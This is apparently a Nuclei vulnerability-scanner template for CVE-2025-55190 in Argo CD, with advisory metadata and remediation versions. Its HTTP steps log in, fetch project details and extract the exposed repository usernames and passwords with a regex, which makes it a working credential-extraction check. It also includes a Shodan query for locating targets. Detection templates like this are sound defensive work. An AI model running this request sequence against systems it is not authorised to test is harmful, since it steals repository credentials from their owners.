id: CVE-2025-55190

info:
  name: ArgoCD Project API Token Repository Credentials Exposure
  author: nukunga[seunghyeonJeon]
  severity: critical
  description: |
    Argo CD API tokens with project-level permissions are able to retrieve sensitive repository credentials (usernames, passwords) through the project details API endpoint, even when the token only has standard application management permissions and no explicit access to secrets.
    This vulnerability affects versions v2.2.0-rc1 and later, including 2.13.0 through 2.13.8, 2.14.0 through 2.14.15, 3.0.0 through 3.0.12, and 3.1.0-rc1 through 3.1.1. Any token with project get permissions is vulnerable, including global permissions.
    Note: This template requires valid ArgoCD credentials (username/password) to test the vulnerability.
  impact: |
    Authenticated attackers with project-level API tokens can retrieve sensitive repository credentials including usernames and passwords without requiring explicit secret access permissions.
  remediation: |
    Upgrade ArgoCD to version 2.13.9, 2.14.16, 3.0.13, 3.1.2, or later depending on your version branch that properly restricts repository credential access.
  reference:
    - https://github.com/argoproj/argo-cd/security/advisories/GHSA-786q-9hcg-v9ff
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55190
    - https://github.com/argoproj/argo-cd/commit/e8f86101f5378662ae6151ce5c3a76e9141900e8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2025-55190
    epss-score: 0.05376
    epss-percentile: 0.90256
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"argo cd"
  tags: cve,cve2025,argocd,credentials,exposure,gitops,kubernetes,vkev

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /api/v1/session HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    extractors:
      - type: json
        name: token
        part: body
        internal: true
        json:
          - '.token'

  - raw:
      - |
        GET /api/v1/projects/default/detailed HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"repositories":'
          - '"username":'
          - '"password":'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: exposed_credentials
        part: body
        group: 1
        regex:
          - '"repositories":\[.*?"username":"([^"]+)".*?"password":"([^"]+)"'
# digest: 4b0a00483046022100e1bfea25532fb0afb12b7471574fc1cb994fa5fbca2ae7b503a6836b71a882db022100c2b15c31d6eca9b8d25629357c029a57ec519f7dadd76868aa4eff5e4f585add:922c64590222798bb761d5b6d8e72950